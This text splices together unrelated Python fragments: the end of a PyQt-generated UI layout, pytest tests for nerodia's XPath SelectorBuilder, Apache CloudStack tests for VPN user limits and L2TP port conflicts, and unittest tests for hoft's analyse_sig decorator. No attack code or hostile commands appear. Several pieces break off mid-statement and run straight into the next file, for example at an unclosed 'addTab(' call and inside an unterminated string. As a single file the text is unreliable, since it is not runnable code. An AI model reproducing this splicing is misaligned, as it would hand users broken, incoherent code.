QtWidgets.QPushButton(self.Qframe_beam_create) 
self.pushButton_save_beam.setObjectName("pushButton_save_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_save_beam, 3, 0, 1, 1) self.pushButton_cancel_light = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_cancel_light.setObjectName("pushButton_cancel_light") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_cancel_light, 3, 1, 1, 1) self.gridLayout_5.addWidget(self.Qframe_beam_create, 1, 0, 1, 6) self.verticalLayout_light.addWidget(self.frame_beam) spacerItem9 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_light.addItem(spacerItem9) self.calculateButton_light = QtWidgets.QPushButton(self.tabWidget_light) self.calculateButton_light.setMinimumSize(QtCore.QSize(100, 0)) self.calculateButton_light.setMaximumSize(QtCore.QSize(350, 16777215)) self.calculateButton_light.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor)) self.calculateButton_light.setObjectName("calculateButton_light") self.verticalLayout_light.addWidget(self.calculateButton_light) spacerItem10 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout_light.addItem(spacerItem10) self.horizontalLayout_4.addLayout(self.verticalLayout_light) self.plot_light = QtWidgets.QVBoxLayout() self.plot_light.setObjectName("plot_light") self.horizontalLayout_4.addLayout(self.plot_light) self.tabWidget_main.addTab(self.tabWidget_light,
# -*- coding: utf-8 -*- from collections import OrderedDict from re import IGNORECASE, compile import pytest from nerodia.elements.html_elements import HTMLElement from nerodia.exception import LocatorException from nerodia.locators.element.selector_builder import SelectorBuilder ATTRIBUTES = HTMLElement.ATTRIBUTES @pytest.fixture def builder(browser_mock): yield SelectorBuilder(ATTRIBUTES, browser_mock) def element_builder(element_mock, scope_built=None): scope_built = scope_built or {'xpath': ".//*[local-name()='div'][@id='table-rows-test']"} builder = SelectorBuilder(ATTRIBUTES, element_mock) element_mock.selector_builder = builder element_mock.selector_builder.built = scope_built return builder class TestBuild(object): def test_without_any_elements(self, builder): items = { 'selector': {}, 'built': {'xpath': './/*'}, 'tag_name': 'html' } assert builder.build(items['selector']) == items['built'] # with xpath or css def test_locates_with_xpath_only(self, builder): items = { 'selector': {'xpath': './/div'}, 'built': {'xpath': './/div'} } assert builder.build(items['selector']) == items['built'] def test_locates_with_css_only(self, builder): items = { 'selector': {'css': 'div'}, 'built': {'css': 'div'} } assert builder.build(items['selector']) == items['built'] def test_locates_when_attributes_combined_with_xpath(self, builder): items = { 'selector': {'xpath': './/div', 'random': 'foo'}, 'built': {'xpath': './/div', 'random': 'foo'} } assert builder.build(items['selector']) == items['built'] def test_locates_when_attributes_combined_with_css(self, builder): items = { 'selector': {'css': 'div', 'random': 'foo'}, 'built': {'css': 'div', 'random': 'foo'} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_using_xpath_and_css(self, builder): message_parts = ["Can not locate element with", "'xpath'", "'css'"] with pytest.raises(LocatorException) as e: builder.build({'xpath': './/*', 'css': 'div'}) assert all(part in e.value.args[0] 
for part in message_parts) def test_raises_exception_when_not_a_string(self, builder): from nerodia.locators.element.selector_builder import STRING_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'xpath': 7}) assert e.value.args[0] == msg # with tag_name def test_with_string_equals(self, builder): items = { 'selector': {'tag_name': 'div'}, 'built': {'xpath': ".//*[local-name()='div']"} } assert builder.build(items['selector']) == items['built'] def test_with_simple_regexp_contains(self, builder): items = { 'selector': {'tag_name': compile(r'div')}, 'built': {'xpath': ".//*[contains(local-name(), 'div')]"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_not_a_string_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'tag_name': 7}) assert e.value.args[0] == msg # with class names def test_class_name_is_converted_to_class(self, builder): items = { 'selector': {'class_name': 'user'}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' user ')]"} } assert builder.build(items['selector']) == items['built'] def test_class_name_values_with_spaces(self, builder): items = { 'selector': {'class_name': 'multiple classes here'}, 'built': { 'xpath': ".//*[contains(concat(' ', @class, ' '), ' multiple classes here ')]"} } assert builder.build(items['selector']) == items['built'] def test_list_of_string_concatenates_with_and(self, builder): items = { 'selector': {'class_name': ['multiple', 'here']}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' multiple ') and " "contains(concat(' ', @class, ' '), ' here ')]"} } assert builder.build(items['selector']) == items['built'] def test_merges_values_when_class_and_class_name_are_both_used(self, builder): items = { 'selector': 
{'class': 'foo', 'class_name': 'bar'}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' foo ') and " "contains(concat(' ', @class, ' '), ' bar ')]"} } assert builder.build(items['selector']) == items['built'] def test_simple_regexp_contains(self, builder): items = { 'selector': {'class_name': compile(r'use')}, 'built': {'xpath': ".//*[contains(@class, 'use')]"} } assert builder.build(items['selector']) == items['built'] def test_negated_string_concatenates_with_not(self, builder): items = { 'selector': {'class_name': '!multiple'}, 'built': {'xpath': ".//*[not(contains(concat(' ', @class, ' '), ' multiple '))]"} } assert builder.build(items['selector']) == items['built'] def test_single_boolean_true_provides_the_at(self, builder): items = { 'selector': {'class_name': True}, 'built': {'xpath': './/*[@class]'} } assert builder.build(items['selector']) == items['built'] def test_single_boolean_false_provides_the_not_at(self, builder): items = { 'selector': {'class_name': False}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_list_of_mixed_string_regexp_boolean_contains_and_concatenates_with_and_and_not(self, builder): items = { 'selector': {'class_name': [compile(r'mult'), 'classes', '!here']}, 'built': { 'xpath': ".//*[contains(@class, 'mult') and contains(concat(' ', @class, ' '), " "' classes ') and not(contains(concat(' ', @class, ' '), ' here '))]"} } assert builder.build(items['selector']) == items['built'] def test_empty_string_finds_elements_without_class(self, builder): items = { 'selector': {'class_name': ''}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_empty_list_finds_elements_without_class(self, builder): items = { 'selector': {'class_name': []}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_not_a_string_regexp_list(self, builder): 
from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES + [bool], int) with pytest.raises(TypeError) as e: builder.build({'class_name': 7}) assert e.value.args[0] == msg def test_raises_exception_when_list_values_are_not_a_str_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES + [bool], int) with pytest.raises(TypeError) as e: builder.build({'class_name': [7]}) assert e.value.args[0] == msg # with attributes as predicates def test_with_href_attribute(self, builder): items = { 'selector': {'href': 'watirspec.css'}, 'built': {'xpath': ".//*[normalize-space(@href)='watirspec.css']"} } assert builder.build(items['selector']) == items['built'] def test_with_string_attribute(self, builder): items = { 'selector': {'id': 'user_new'}, 'built': {'xpath': ".//*[@id='user_new']"} } assert builder.build(items['selector']) == items['built'] def test_with_true_no_equals(self, builder): items = { 'selector': {'tag_name': 'input', 'name': True}, 'built': {'xpath': ".//*[local-name()='input'][@name]"} } assert builder.build(items['selector']) == items['built'] def test_with_false_not_with_no_equals(self, builder): items = { 'selector': {'tag_name': 'input', 'name': False}, 'built': {'xpath': ".//*[local-name()='input'][not(@name)]"} } assert builder.build(items['selector']) == items['built'] def test_with_multiple_attributes_no_equals_and_not_with_no_equals_and_equals(self, builder): items = { 'selector': OrderedDict([('readonly', True), ('foo', False), ('id', 'good_luck')]), 'built': {'xpath': ".//*[@readonly and not(@foo) and @id='good_luck']"} } assert builder.build(items['selector']) == items['built'] # with attributes as partials def test_with_regexp(self, builder): items = { 'selector': {'name': compile(r'user')}, 'built': {'xpath': ".//*[contains(@name, 'user')]"} } assert 
builder.build(items['selector']) == items['built'] def test_with_multiple_regexp_attributes_separated_by_and(self, builder): items = { 'selector': OrderedDict([('readonly', compile(r'read')), ('id', compile(r'good'))]), 'built': {'xpath': ".//*[contains(@readonly, 'read') and contains(@id, 'good')]"} } assert builder.build(items['selector']) == items['built'] # text def test_string_uses_normalize_space_equals(self, builder): items = { 'selector': {'text': 'Add user'}, 'built': {'xpath': ".//*[normalize-space()='Add user']"} } assert builder.build(items['selector']) == items['built'] def test_with_caption_attribute(self, builder): items = { 'selector': {'caption': 'Add user'}, 'built': {'xpath': ".//*[normalize-space()='Add user']"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_text_is_not_a_str_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'text': 7}) assert e.value.args[0] == msg # with index def test_index_positive(self, builder): items = { 'selector': {'tag_name': 'div', 'index': 7}, 'built': {'xpath': "(.//*[local-name()='div'])[8]"} } assert builder.build(items['selector']) == items['built'] def test_index_negative(self, builder): items = { 'selector': {'tag_name': 'div', 'index': -7}, 'built': {'xpath': "(.//*[local-name()='div'])[last()-6]"} } assert builder.build(items['selector']) == items['built'] def test_index_last(self, builder): items = { 'selector': {'tag_name': 'div', 'index': -1}, 'built': {'xpath': "(.//*[local-name()='div'])[last()]"} } assert builder.build(items['selector']) == items['built'] def test_index_does_not_return_index_if_zero(self, builder): items = { 'selector': {'tag_name': 'div', 'index': 0}, 'built': {'xpath': ".//*[local-name()='div']"} } assert builder.build(items['selector']) == items['built'] def 
test_raises_exception_when_index_is_not_an_integer(self, builder): msg = "expected one of {!r}, got 'foo':{}".format([int], str) with pytest.raises(TypeError) as e: builder.build({'index': 'foo'}) assert e.value.args[0] == msg # with labels def test_locates_the_element_associated_with_the_label_element_located_by_the_text_of_the_provided_label_key( self, builder): items = { 'selector': {'label': 'Cars'}, 'built': {'xpath': ".//*[@id=//label[normalize-space()='Cars']/@for or " "parent::label[normalize-space()='Cars']]"} } assert builder.build(items['selector']) == items['built'] def test_returns_a_label_element_if_complex(self, builder): items = { 'selector': {'label': compile(r'Ca|rs')}, 'built': {'xpath': './/*', 'label_element': compile(r'Ca|rs')} } assert builder.build(items['selector']) == items['built'] def test_returns_a_visible_label_element_if_complex(self, builder): items = { 'selector': {'visible_label': compile(r'Ca|rs')}, 'built': {'xpath': './/*', 'visible_label_element': compile(r'Ca|rs')} } assert builder.build(items['selector']) == items['built'] def test_does_not_use_the_label_element_when_label_is_a_valid_attribute(self, browser_mock): from nerodia.elements.option import Option builder = SelectorBuilder(Option.ATTRIBUTES, browser_mock) items = { 'selector': {'tag_name': 'option', 'label': 'Germany'}, 'built': {'xpath': ".//*[local-name()='option'][@label='Germany']"} } assert builder.build(items['selector']) == items['built'] # with adjacent locators def test_raises_exception_when_not_a_valid_value(self, builder): with pytest.raises(LocatorException, match='Unable to process adjacent locator with foo'): builder.build({'adjacent': 'foo', 'index': 0}) # parent def test_parent_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'ancestor', 'index': 0}, 'built': {'xpath': './ancestor::*[1]'} } assert builder.build(items['selector']) == items['built'] def test_parent_with_index(self, builder): items = { 'selector': {'adjacent': 
'ancestor', 'index': 2}, 'built': {'xpath': './ancestor::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_parent_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'ancestor', 'id': True, 'tag_name': 'div', 'class_name': 'ancestor', 'index': 1}, 'built': { 'xpath': "./ancestor::*[local-name()='div'][contains(concat(' ', @class, ' '), " "' ancestor ')][@id][2]"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_for_parent_when_text_locator_is_used(self, builder): with pytest.raises(LocatorException, match='Can not find parent element with text locator'): builder.build({'adjacent': 'ancestor', 'index': 0, 'text': 'Foo'}) # following sibling def test_following_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'following', 'index': 0}, 'built': {'xpath': './following-sibling::*[1]'} } assert builder.build(items['selector']) == items['built'] def test_following_with_index(self, builder): items = { 'selector': {'adjacent': 'following', 'index': 2}, 'built': {'xpath': './following-sibling::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_following_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'following', 'tag_name': 'div', 'class_name': 'b', 'index': 0, 'id': True}, 'built': {'xpath': "./following-sibling::*[local-name()='div']" "[contains(concat(' ', @class, ' '), ' b ')][@id][1]"} } assert builder.build(items['selector']) == items['built'] def test_following_with_text(self, builder): items = { 'selector': {'adjacent': 'following', 'text': 'Third', 'index': 0}, 'built': {'xpath': "./following-sibling::*[normalize-space()='Third'][1]"} } assert builder.build(items['selector']) == items['built'] # previous sibling def test_previous_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'preceding', 'index': 0}, 'built': {'xpath': './preceding-sibling::*[1]'} } assert 
builder.build(items['selector']) == items['built'] def test_previous_with_index(self, builder): items = { 'selector': {'adjacent': 'preceding', 'index': 2}, 'built': {'xpath': './preceding-sibling::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_previous_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'preceding', 'tag_name': 'div', 'class_name': 'b', 'index': 0, 'id': True}, 'built': {'xpath': "./preceding-sibling::*[local-name()='div']" "[contains(concat(' ', @class, ' '), ' b
<filename>test/integration/component/test_vpn_users.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ P1 tests for VPN users """ # Import Local Modules from nose.plugins.attrib import attr from marvin.cloudstackException import CloudstackAPIException from marvin.cloudstackTestCase import cloudstackTestCase from marvin.lib.base import ( Account, ServiceOffering, VirtualMachine, PublicIPAddress, Vpn, VpnUser, Configurations, NATRule ) from marvin.lib.common import (get_domain, get_zone, get_template ) from marvin.lib.utils import cleanup_resources class Services: """Test VPN users Services """ def __init__(self): self.services = { "account": { "email": "<EMAIL>", "firstname": "Test", "lastname": "User", "username": "test", # Random characters are appended for unique # username "password": "password", }, "service_offering": { "name": "Tiny Instance", "displaytext": "Tiny Instance", "cpunumber": 1, "cpuspeed": 100, # in MHz "memory": 128, # In MBs }, "disk_offering": { "displaytext": "Small Disk Offering", "name": "Small Disk Offering", "disksize": 1 }, "virtual_machine": { "displayname": "TestVM", "username": "root", "password": "password", "ssh_port": 22, "hypervisor": 'KVM', "privateport": 22, "publicport": 22, "protocol": 'TCP', }, "vpn_user": 
{ "username": "test", "password": "<PASSWORD>", }, "natrule": { "privateport": 1701, "publicport": 1701, "protocol": "UDP" }, "ostype": 'CentOS 5.5 (64-bit)', "sleep": 60, "timeout": 10, # Networking mode: Advanced, Basic } class TestVPNUsers(cloudstackTestCase): @classmethod def setUpClass(cls): cls.testClient = super(TestVPNUsers, cls).getClsTestClient() cls.api_client = cls.testClient.getApiClient() cls.services = Services().services # Get Zone, Domain and templates cls.domain = get_domain(cls.api_client) cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests()) cls.services["mode"] = cls.zone.networktype cls.template = get_template( cls.api_client, cls.zone.id, cls.services["ostype"] ) cls.services["virtual_machine"]["zoneid"] = cls.zone.id cls.service_offering = ServiceOffering.create( cls.api_client, cls.services["service_offering"] ) cls._cleanup = [cls.service_offering, ] return @classmethod def tearDownClass(cls): try: # Cleanup resources used cleanup_resources(cls.api_client, cls._cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def setUp(self): try: self.apiclient = self.testClient.getApiClient() self.dbclient = self.testClient.getDbConnection() self.account = Account.create( self.apiclient, self.services["account"], domainid=self.domain.id ) self.cleanup = [ self.account, ] self.virtual_machine = VirtualMachine.create( self.apiclient, self.services["virtual_machine"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering.id ) self.public_ip = PublicIPAddress.create( self.apiclient, accountid=self.virtual_machine.account, zoneid=self.virtual_machine.zoneid, domainid=self.virtual_machine.domainid, services=self.services["virtual_machine"] ) return except CloudstackAPIException as e: self.tearDown() raise e def tearDown(self): try: # Clean up, terminate the created instance, volumes and snapshots 
cleanup_resources(self.apiclient, self.cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def create_VPN(self, public_ip): """Creates VPN for the network""" self.debug("Creating VPN with public IP: %s" % public_ip.ipaddress.id) try: # Assign VPN to Public IP vpn = Vpn.create(self.apiclient, self.public_ip.ipaddress.id, account=self.account.name, domainid=self.account.domainid) self.debug("Verifying the remote VPN access") vpns = Vpn.list(self.apiclient, publicipid=public_ip.ipaddress.id, listall=True) self.assertEqual( isinstance(vpns, list), True, "List VPNs shall return a valid response" ) return vpn except Exception as e: self.fail("Failed to create remote VPN access: %s" % e) def create_VPN_Users(self, rand_name=True, api_client=None): """Creates VPN users for the network""" self.debug("Creating VPN users for account: %s" % self.account.name) if api_client is None: api_client = self.apiclient try: vpnuser = VpnUser.create( api_client, self.services["vpn_user"]["username"], self.services["vpn_user"]["password"], account=self.account.name, domainid=self.account.domainid, rand_name=rand_name ) self.debug("Verifying the remote VPN access") vpn_users = VpnUser.list(self.apiclient, id=vpnuser.id, listall=True) self.assertEqual( isinstance(vpn_users, list), True, "List VPNs shall return a valid response" ) return vpnuser except Exception as e: self.fail("Failed to create remote VPN users: %s" % e) @attr(tags=["advanced", "advancedns"]) @attr(configuration='remote.access.vpn.user.limit') def test_01_VPN_user_limit(self): """VPN remote access user limit tests""" # Validate the following # prerequisite: change management configuration setting of # remote.access.vpn.user.limit # 1. 
provision more users than is set in the limit # Provisioning of users after the limit should failProvisioning of # users after the limit should fail self.debug("Fetching the limit for remote access VPN users") configs = Configurations.list( self.apiclient, name='remote.access.vpn.user.limit', listall=True) self.assertEqual(isinstance(configs, list), True, "List configs should return a valid response") limit = int(configs[0].value) self.debug("Enabling the VPN access for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Creating %s VPN users" % limit) for x in range(limit): self.create_VPN_Users() self.debug("Adding another user exceeding limit for remote VPN users") with self.assertRaises(Exception): self.create_VPN_Users() self.debug("Limit exceeded exception raised!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_02_use_vpn_port(self): """Test create VPN when L2TP port in use""" # Validate the following # 1. set a port forward for UDP: 1701 and enable VPN # 2. set port forward rule for the udp port 1701 over which L2TP works # 3. port forward should prevent VPN from being enabled self.debug("Creating a port forwarding rule on port 1701") # Create NAT rule nat_rule = NATRule.create( self.apiclient, self.virtual_machine, self.services["natrule"], self.public_ip.ipaddress.id) self.debug("Verifying the NAT rule created") nat_rules = NATRule.list(self.apiclient, id=nat_rule.id, listall=True) self.assertEqual(isinstance(nat_rules, list), True, "List NAT rules should return a valid response") self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) with self.assertRaises(Exception): self.create_VPN(self.public_ip) self.debug("Create VPN connection failed! Test successful!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_03_enable_vpn_use_port(self): """Test create NAT rule when VPN when L2TP enabled""" # Validate the following # 1. 
Enable a VPN connection on source NAT # 2. Add a VPN user # 3. add a port forward rule for UDP port 1701. Should result in error # saying that VPN is enabled over port 1701 self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Creating a port forwarding rule on port 1701") # Create NAT rule with self.assertRaises(Exception): NATRule.create( self.apiclient, self.virtual_machine, self.services["natrule"], self.public_ip.ipaddress.id) self.debug("Create NAT rule failed! Test successful!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_04_add_new_users(self): """Test add new users to existing VPN""" # Validate the following # 1. Enable a VPN connection on source NAT # 2. Add new user to VPN when there are already existing users. # 3. We should be able to successfully establish a VPN connection using # the newly added user credential. self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) try: self.debug("Adding new VPN user to account: %s" % self.account.name) self.create_VPN_Users() # TODO: Verify the VPN connection self.debug("Adding another user to account") self.create_VPN_Users() # TODO: Verify the VPN connection with new user except Exception as e: self.fail("Failed to create new VPN user: %s" % e) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_05_add_duplicate_user(self): """Test add duplicate user to existing VPN""" # Validate the following # 1. Enable a VPN connection on source NAT # 2. Add a VPN user say "abc" that already an added user to the VPN. # 3. Adding this VPN user should fail. 
self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Adding new VPN user to account: %s" % self.account.name) self.create_VPN_Users(rand_name=False) # TODO: Verify the VPN connection self.debug("Adding another user to account with same username") with self.assertRaises(Exception): self.create_VPN_Users(rand_name=False) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_06_add_VPN_user_global_admin(self): """Test as global admin, add a new VPN user to an existing VPN entry that was created by another account.""" # Steps for verification # 1. Create a new user and deploy few Vms. # 2. Enable VPN access. Add few VPN users. # 3. Make sure that VPN access works as expected. # 4. As global Admin , add VPN user to this user's existing VPN entry. # Validate the following # 1. The newly added VPN user should get configured to the router of # user account. # 2. We should be able to use this newly created user credential to # establish VPN connection that will give access all VMs of this user self.debug("Enabling VPN connection to account: %s" % self.account.name) self.create_VPN(self.public_ip) self.debug("Creating VPN user for the account: %s" % self.account.name) self.create_VPN_Users() self.debug("Creating a global admin account") admin = Account.create(self.apiclient, self.services["account"], admin=True, domainid=self.account.domainid) self.cleanup.append(admin) self.debug("Creating API client for newly created user") api_client = self.testClient.getUserApiClient( UserName=self.account.name, DomainName=self.account.domain) self.debug("Adding new user to VPN as a global admin: %s" % admin.name) try: self.create_VPN_Users(api_client=api_client) except Exception as e: self.fail("Global admin should be allowed to create VPN user: %s" % e) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def
#!/usr/bin/env python # -*- coding: latin-1 -*- # from __future__ import print_function import unittest from mock import Mock from hoft import ArgsNotAnalysedError, IGNORE, KeywordError, NOVALUE, NotAnalysedError, \ PositionalError, analyse_sig from tests.helpers import check_calls class _Success(Exception): pass class _Error(Exception): pass class AnalyseSigNoDefaultTestCase(unittest.TestCase): def setUp(self): self._f_a = Mock() self._f_c = Mock() self._f_f = Mock() self._f_on_error = Mock() def tearDown(self): pass def test_analyse_sig_strict_with_on_error_handler_no_errors(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print('f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() self.assertRaises(_Success, voo, 11, 22, 33, 44, e=99) self._f_on_error.assert_called_once() cargs = self._f_on_error.call_args_list[0][0] self.assertIsInstance(cargs[0], ArgsNotAnalysedError) self.assertEqual(set(cargs[0].names), set(['b', 'e', 'g', 'kwargs'])) self.assertEqual(len(cargs[1]), 1) self.assertIsInstance(cargs[1][0], NotAnalysedError) self.assertEqual(set(cargs[1][0].name), set(['b', 'e', 'g', 'kwargs'])) self.assertIs(cargs[1][0].error, cargs[0]) self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') 
self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) def test_analyse_sig_strict_without_on_error_handler_fail_slow_no_errors(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print( # 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, # _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except ArgsNotAnalysedError as e: self.assertEqual(set(e.names), set(['b', 'e', 'g', 'kwargs'])) errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) error = errors[0] self.assertIsInstance(error, NotAnalysedError) self.assertIsInstance(error.error, ArgsNotAnalysedError) self.assertEqual(set(error.name), set(['b', 'e', 'g', 'kwargs'])) self.assertDictEqual( { 'a': 11, 'b': 22, 'c': 33, 'd': 44, 'e': 99, 'f': '2', 'g': {3: 4}, 'kwargs': {}, }, error.callargs) print(error.callargs) self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_without_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, 
value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print( # 'f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 4) # print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) self.assertEqual(error.name, 'a') self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.value, 11) self.assertEqual(error.index, 0) self.assertIsInstance(error.error, _Error) self.assertEqual(error.error.message, 'a') self.assertEqual(len(error.error._errors_), 4) error = errors[1] self.assertIsInstance(error, PositionalError) self.assertEqual(error.name, 'c') self.assertEqual(error.func_name, 'f_c') self.assertEqual(error.value, 33) self.assertEqual(error.index, 2) self.assertIsInstance(error.error, _Error) self.assertEqual(error.error.message, 'c') error = errors[2] self.assertIsInstance(error, KeywordError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'f') self.assertEqual(error.func_name, 'f_f') self.assertEqual(error.value, NOVALUE) self.assertEqual(error.error.message, 'f') self.assertEqual(error.name, 'f') self.assertEqual(error.default_value, '2') error = errors[3] 
self.assertIsInstance(error, NotAnalysedError) self.assertEqual(set(error.name), set(['b', 'e', 'g', 'kwargs'])) self.assertIsInstance(error.error, ArgsNotAnalysedError) self.assertEqual(set(error.error.names), set(['b', 'e', 'g', 'kwargs'])) self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_without_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.name, 'a') self.assertEqual(error.value, 11) self.assertIsInstance(error.error, _Error) self._f_on_error.assert_not_called() self._f_f.assert_not_called() 